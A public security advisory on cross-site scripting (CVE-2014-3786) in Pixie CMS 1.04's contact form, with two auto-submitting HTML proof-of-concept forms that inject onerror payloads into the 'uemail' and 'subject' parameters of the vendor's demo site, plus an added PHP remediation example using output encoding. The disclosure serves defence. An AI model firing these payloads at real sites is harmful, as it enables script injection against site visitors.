Pixie CMS 1.04 Cross Site Scripting

2014.05.31
Credit: Filippos
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Pixie CMS v1.04 (Contact form) POST XSS Vulnerabilities

Vendor: Pixie CMS
Product web page: http://www.getpixie.co.uk
Affected version: 1.04
Severity: Medium
CVE: CVE-2014-3786
Demo page: http://demo.getpixie.co.uk
Discovered by: Filippos Mastrogiannis (@filipposmastro) & Simone Memoli (@Simon90_Italy)

Pixie is a free, open source CMS, a.k.a. a small, simple website maker (as the vendor states on its website).

Description:
Pixie (v1.04) suffers from several POST XSS vulnerabilities in the Contact form (contact.php). The user input passed through the POST parameters 'uemail' and 'subject' is not properly sanitized, allowing an attacker to execute HTML code in the user's browser session on the affected site. The vulnerable component is the contact module of Pixie v1.04, found at /pixie_v1.04/admin/modules/contact.php in the source code.

Tested on: Ubuntu 13.10 with Mozilla Firefox 29.0 / Microsoft Windows 7 with Mozilla Firefox 29.0.1

Proof Of Concept:

<html>
<title>Pixie CMS v1.04 Contact form (uemail parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='"><img src=x onerror=prompt(document.domain);>'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='xss'>
</form>
<script>document.xss.submit();</script>
</html>

<html>
<title>Pixie CMS v1.04 Contact form (subject parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='xss'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='"><img src=x onerror=prompt(document.location);>'>
</form>
<script>document.xss.submit();</script>
</html>

Disclosure Timeline:
[13.05.2014] Vulnerabilities discovered.
[13.05.2014] Initial contact with the vendor.
[15.05.2014] 1st response from the official maintainer.
[30.05.2014] 2nd response from the official maintainer.
[30.05.2014] Public security advisory released.
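The defect the advisory describes is a submitted value written back into HTML without output encoding. The PHP below is an added illustration written for this page, not Pixie's contact.php: it shows the unsafe reflection pattern beside the corrected one, using htmlspecialchars() for the attribute context and filter_var() as an extra input check. The function names and the minimal form markup are assumptions; the sample POST body is constructed from the advisory's PoC payload.

```php
<?php
// Added illustration, not Pixie's code: a minimal contact-form handler that
// reflects the submitted fields back into the page. The first renderer has
// the defect the advisory describes; the second encodes before interpolating.

// Constructed sample POST body, modelled on the advisory's uemail payload.
$post = [
    'contact' => '1',
    'uemail'  => '"><img src=x onerror=prompt(document.domain);>',
    'subject' => 'xss',
];

// Vulnerable pattern (assumed shape): the raw parameter lands inside an
// HTML attribute, so a leading double quote closes the attribute early and
// everything after it is parsed as markup.
function renderUnsafe(array $post): string
{
    return '<input type="text" name="uemail" value="' . ($post['uemail'] ?? '') . '">'
         . '<input type="text" name="subject" value="' . ($post['subject'] ?? '') . '">';
}

// Output encoding for the HTML attribute context: quotes, angle brackets and
// ampersands become entities and can no longer change the document structure.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: same template, every interpolated value passed through h().
function renderSafe(array $post): string
{
    return '<input type="text" name="uemail" value="' . h($post['uemail'] ?? '') . '">'
         . '<input type="text" name="subject" value="' . h($post['subject'] ?? '') . '">';
}

// Input validation on top of (never instead of) output encoding: a value that
// is not an e-mail address at all can be rejected before it reaches any template.
function validEmail(string $s): bool
{
    return filter_var($s, FILTER_VALIDATE_EMAIL) !== false;
}

echo renderUnsafe($post), "\n";        // attribute closed early; <img ... onerror=...> is live markup
echo renderSafe($post), "\n";          // value contains &quot;&gt;&lt;img ... and stays inert text
var_dump(validEmail($post['uemail'])); // bool(false): the payload fails validation as well
```

Encoding must match the output context: htmlspecialchars() with ENT_QUOTES covers HTML element and attribute bodies, while a value placed into a JavaScript string, a URL or a CSS rule needs the encoder for that context instead. Validation of 'uemail' is a useful second layer but does not cover 'subject', which is free text and relies on the encoding alone.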


Copyright 2024, cxsecurity.com